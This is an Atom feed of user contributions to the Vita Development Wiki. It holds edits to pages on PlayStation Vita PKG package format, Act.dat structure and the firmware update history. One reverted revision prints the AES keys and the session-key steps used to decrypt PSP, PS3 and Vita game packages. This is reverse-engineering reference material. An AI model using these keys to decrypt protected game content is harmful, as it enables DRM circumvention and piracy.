http://wiki.henkaku.xyz/vita/api.php?action=feedcontributions&user=Xyz&feedformat=atomVita Development Wiki - User contributions [en]2024-03-29T12:54:36ZUser contributionsMediaWiki 1.35.14http://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=17406Main Page/Header2022-07-13T14:48:38Z<p>Xyz: </p>
<hr />
<div><br />
== Welcome To Vita Development Wiki ==<br />
<br />
Chat with us on [https://discord.gg/m7MwpKA Discord].</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=17405Main Page/Header2022-07-13T14:46:28Z<p>Xyz: </p>
<hr />
<div><br />
== Welcome To Vita Development Wiki ==<br />
<br />
Chat with us on Discord: [https://discord.gg/m7QGqj5 HENkaku #wiki] (most active, stay around until someone answers!).</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Packages&diff=13481Packages2020-02-17T19:26:33Z<p>Xyz: </p>
<hr />
<div>PKG files for PSVita are essentially the same structure as PS3 and PSP game PKG files with different AES, RSA and ECC keys.<br />
<br />
== Algorithm ==<br />
<br />
=== Keys ===<br />
<br />
See [[Keys#PKG_AES_Keys]].<br />
<br />
The overall algorithm is the same as PSP with one exception.<br />
<br />
=== PS3 / PSP ===<br />
<br />
On the PS3/PSP, the file table and the data is AES CTR encrypted using the 0x10 bytes from offset 0x70 in the file as the IV along with the PS3/PSP AES Key.<br />
<br />
=== PSVita / PSM ===<br />
<br />
On the PSVita for type 2, 3 and 4, they first encrypt the 0x10 bytes at 0x70 to create a new AES session key, then do the normal AES_CTR with 0x70 as the IV and the new session key as the AES CTR key.<br />
<br />
=== PKG key id ===<br />
<br />
At offset 0xE7 in the PKG file is a version byte. This is only in the PSP type PKG files inside the .ext section. If it is type 1, then use the PSP key as normal, if it is type 2, use the PSV2 key with the new session key step, and if its type 3, use the PSV3, etc.<br />
<br />
== Installing ==<br />
<br />
Package Installer uses SceNpDrm to decrypt/extract the game package into a temporary directory. Then it calls scePromoterUtilityPromotePkgWithRif on 1.69 and scePromoterUtilityPromotePkg on 1.80+ to "promote" (aka install) the files into the right directory in ux0. ScePromoterUtil is just a wrapper for a SceShellSvc call, so SceShell actually moves the files, then adds the LiveArea bubble and updates app.db accordingly. After getting userland execution, you can use SceNpDrm and ScePromoterUtil separately and package your games in an alternative format, for example .vpk.<br />
<br />
<br />
[[Category:Formats]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Packages&diff=13480Packages2020-02-17T19:23:56Z<p>Xyz: Reverted edits by CelesteBlue (talk) to last revision by St4rk</p>
<hr />
<div>PKG files for PSVita are essentially the same structure as PS3 and PSP game PKG files with different AES, RSA and ECC keys.<br />
<br />
== AES Keys ==<br />
There now are 5 AES keys used for the decryption of game PKG files.<br />
<br />
*PSP : <code>{ 0x07, 0xf2, 0xc6, 0x82, 0x90, 0xb5, 0x0d, 0x2c, 0x33, 0x81, 0x8d, 0x70, 0x9b, 0x60, 0xe6, 0x2b };</code><br />
*PS3 : <code>{ 0x2e, 0x7b, 0x71, 0xd7, 0xc9, 0xc9, 0xa1, 0x4e, 0xa3, 0x22, 0x1f, 0x18, 0x88, 0x28, 0xb8, 0xf8 };</code><br />
*PSV2: <code>{ 0xE3, 0x1A, 0x70, 0xC9, 0xCE, 0x1D, 0xD7, 0x2B, 0xF3, 0xC0, 0x62, 0x29, 0x63, 0xF2, 0xEC, 0xCB };</code><br />
*PSV3: <code>{ 0x42, 0x3A, 0xCA, 0x3A, 0x2B, 0xD5, 0x64, 0x9F, 0x96, 0x86, 0xAB, 0xAD, 0x6F, 0xD8, 0x80, 0x1F };</code><br />
*PSV4: <code>{ 0xAF, 0x07, 0xFD, 0x59, 0x65, 0x25, 0x27, 0xBA, 0xF1, 0x33, 0x89, 0x66, 0x8B, 0x17, 0xD9, 0xEA };</code><br />
<br />
The overall algorithm is the same as PSP with one exception. On the PSP, the file table and the data is AES CTR encrypted using the 0x10 bytes from offset +0x70 in the file as the IV along with the PSP AES Key. On the PSVita for type 2,3 and 4, they first encrypt the 0x10 bytes at +0x70 to create a new AES session key, then do the normal AES_CTR with +0x70 as the IV and the new session key as the AES CTR key.<br />
<br />
<br />
At offset +0xE7 in the PKG file is a version byte. This is only in the PSP type PKG files inside the .ext section. If its type 1, the use the PSP key as normal, if its type 2, use the PSV2 key with the new session key step, and if its type 3, use the PSV3, etc.<br />
<br />
== Installing ==<br />
<br />
Package Installer uses SceNpDrm to decrypt/extract the game package into a temporary directory. Then it calls ScePromoterUtil NID 0x86641BC6 on 1.69 and NID 0x716C81F4 on 1.80+ to "promote" (aka install) the files into the right directory in ux0. ScePromoterUtil is just a wrapper for a SceShellSvc call, so SceShell actually moves the files, then adds the LiveArea bubble and updates app.db accordingly. In theory you can use SceNpDrm and ScePromoterUtil separately and package your games in an alternative format.<br />
<br />
[[Category:Formats]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Act.dat&diff=12683Act.dat2019-12-27T22:07:28Z<p>Xyz: Reverted edits by Princess of Sleeping (talk) to last revision by SKGleba</p>
<hr />
<div>== Structure ==<br />
<br />
{| class="wikitable sortable"<br />
| style="background-color:#123EDA; color:#FFFFFF;" |'''Name'''<br />
| style="background-color:#123EDA; color:#FFFFFF;" |'''Offset'''<br />
| style="background-color:#123EDA; color:#FFFFFF;" |'''Size''' <br />
| style="background-color:#123EDA; color:#FFFFFF;" |'''Example'''<br />
| style="background-color:#123EDA; color:#FFFFFF;" |'''Remark'''<br />
|-<br />
| Activation Type || 0x0 || 0x4 || 00000001 || <br />
|-<br />
| Version || 0x4 || 0x4 || 00000001, 00000002 || 1(old) or 2(current)<br />
|-<br />
| Account ID || 0x8 || 0x8 || AB CD EF 01 02 34 78 91 || PSN Account ID<br />
|-<br />
| Primary Key Table || 0x10 || 0x800 || N.A || Encrypted RIF keys table<br />
|-<br />
| Unknown1 || 0x810 || 0x40 || N.A||<br />
|-<br />
| OpenPsId || 0x850 || 0x10 || N.A|| <br />
|-<br />
| Unknown3 || 0x860 || 0x10 || N.A|| Encrypted_data for v.1 / Padding for v.2<br />
|-<br />
| Unknown4 || 0x870 || 0x10 || N.A|| Encrypted_data for v.1 / Time_Stamp for v.2<br />
|-<br />
| Secondary Table || 0x880 || 0x650 || N.A ||<br />
|-<br />
| RSA Signature|| 0xED0 || 0x100 || N.A|| RSA Public Key for RIF type 0 and 1<br />
|-<br />
| Unknown Sig || 0xFD0 || 0x40 || N.A|| params are unknown<br />
|-<br />
| ECDSA Signature || 0x1010 || 0x28 || N.A|| pub=vsh_pub, ctype=0x02(vsh_curves)<br />
|}<br />
<br />
The Primary Key table is unique per PSN account. It is encrypted using ECB with the ConsoleId of the console activated with this PSN account.</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=System_Software&diff=11838System Software2019-10-18T01:25:45Z<p>Xyz: /* Version 3 */</p>
<hr />
<div>== History of updates ==<br />
Originally taken from [https://en.wikipedia.org/w/index.php?title=PlayStation_Vita_system_software&oldid=746007330 Wikipedia].<br />
<br />
=== Version 1 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''1.03'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.04'''<br />December 17, 2011<br />
|<br />
* Provided only with Shin Kamaitachi no Yoru: 11 Hitome no Suspect<br />
|-<br />
|align=center|'''1.05'''<br />December 17, 2011<br />
|<br />
* Japanese release firmware<br />
|-<br />
|align=center|'''1.06'''<br />February 15, 2012<br />
|<br />
* EU release firmware<br />
* US First Edition Bundle release firmware<br />
|-<br />
|align=center|'''1.50'''<br />December 17, 2011<br />
|<br />
;System<br />
* Support for the PlayStation Vita cradle.<br />
|-<br />
|align=center|'''1.51'''<br />December 27, 2011<br />
|<br />
;System<br />
* Addresses freezing issues with certain games.<br />
|-<br />
|align=center|'''1.52'''<br />January 16, 2012<br />
|<br />
;System<br />
*Improved system stability.<br />
*The 1.51 bug where the 3G/Wi-Fi SKU would not recognize a SIM card has been fixed.<ref>http://www.theverge.com/gaming/2012/1/16/2712066/playstation-vita-updated-to-version-1-52-in-japan-fixes-3g-sim</ref><br />
|-<br />
|align=center|'''1.60'''<ref>http://play-beyond.net/2012/02/08/ps-vita-system-update-1-60-full-change-log/</ref><br />February 8, 2012<br />
|<br />
;Apps<br />
*An application powered by Google Maps has been added.<br />
<br />
;Near<br />
*In [near], information about players is now displayed on the [Discoveries] screen.<br />
<br />
;Content Manager<br />
*Users can now delete backup files in [Content Manager].<br />
<br />
;Photos<br />
*Users can now record video under the [Photos] application.<br />
<br />
;System<br />
*The PS button will now flash blue while the battery is charging.<br />
*In [Settings], the position where [Flight Mode] appears has been changed.<br />
*You can now publish stories about the products that you rate in PlayStation Store to Facebook.<br />
*You can now report inappropriate messages in [Group Messaging] and inappropriate comments about an activity.<br />
*“PlayStation Network account” has been renamed to “Sony Entertainment Network account”.<br />
|-<br />
|align=center|'''1.61'''<ref>http://blog.us.playstation.com/2012/02/20/ps-vita-system-software-update-v1-61</ref><br />February 21, 2012<br />
|<br />
;System<br />
*Improves certain aspects of the system software.<br />
*Fixed [[Vulnerabilities#Syscall_handler_doesn.27t_check_syscall_number|SVC table overflow vulnerability]]. (Pretty sure this is the version they fixed it in [[User:Xyz|Xyz]] ([[User talk:Xyz|talk]]) 04:24, 19 April 2017 (UTC))<br />
|-<br />
|align=center|'''1.65'''<ref>http://blog.us.playstation.com/2012/04/02/ps-vita-system-software-update-v1-65</ref><br />April 3, 2012<br /><small>''Replaced with 1.66''</small><br />
|<br />
;System<br />
* [Notification Alert] has been added to [Settings], allowing users to toggle alerts on and off.<br />
* [After 10 Minutes] has been added to time options under [Power Save Settings].<br />
* Caps Lock is now supported in the On Screen Keyboard.<br />
* An arrow icon will now display when PS Vita finds new activities in the LiveArea.<br />
* Addition of installation progress bar for downloaded games and DLC.<br />
* minis with a pre-set expiry date (such as those obtained via PlayStation Plus) now load correctly.<br />
* Fixes security issues with two PSP games that allowed users to run unauthorized content on the device through an exploit.<ref>http://wololo.net/wagic/2012/04/04/ps-vita-firmware-update-1-66-available/</ref> <br />
|-<br />
|align=center|'''1.66'''<ref>http://www.engadget.com/2012/04/04/playstation-vita-1-66-firmware-update/</ref><br />April 4, 2012<br />
|<br />
;System<br />
* Fixed problems which appeared in 1.65<br />
* [Settings]<br />
* The [System Music] setting in [Settings] > [Sound and Display] now affects background music in [PS Store], [near], the Sign-Up screens, and the Home menu.<br />
* The display time of notification alerts has been reduced from 5 seconds to 3 seconds.<br />
* Functional improvements have been made in the following games and applications: Unit 13, Gravity Daze, near.<br />
<br />
;Near<br />
* When searching for location data, users now have the option to [Retry] and [Cancel] when a failure occurs.<br />
* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several Game Exploits, Fieldrunners and others, that were actually undisclosed, got fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles got fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles got fixed as well.<br />
* Internal firmware changes now prevent the execution of bigger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
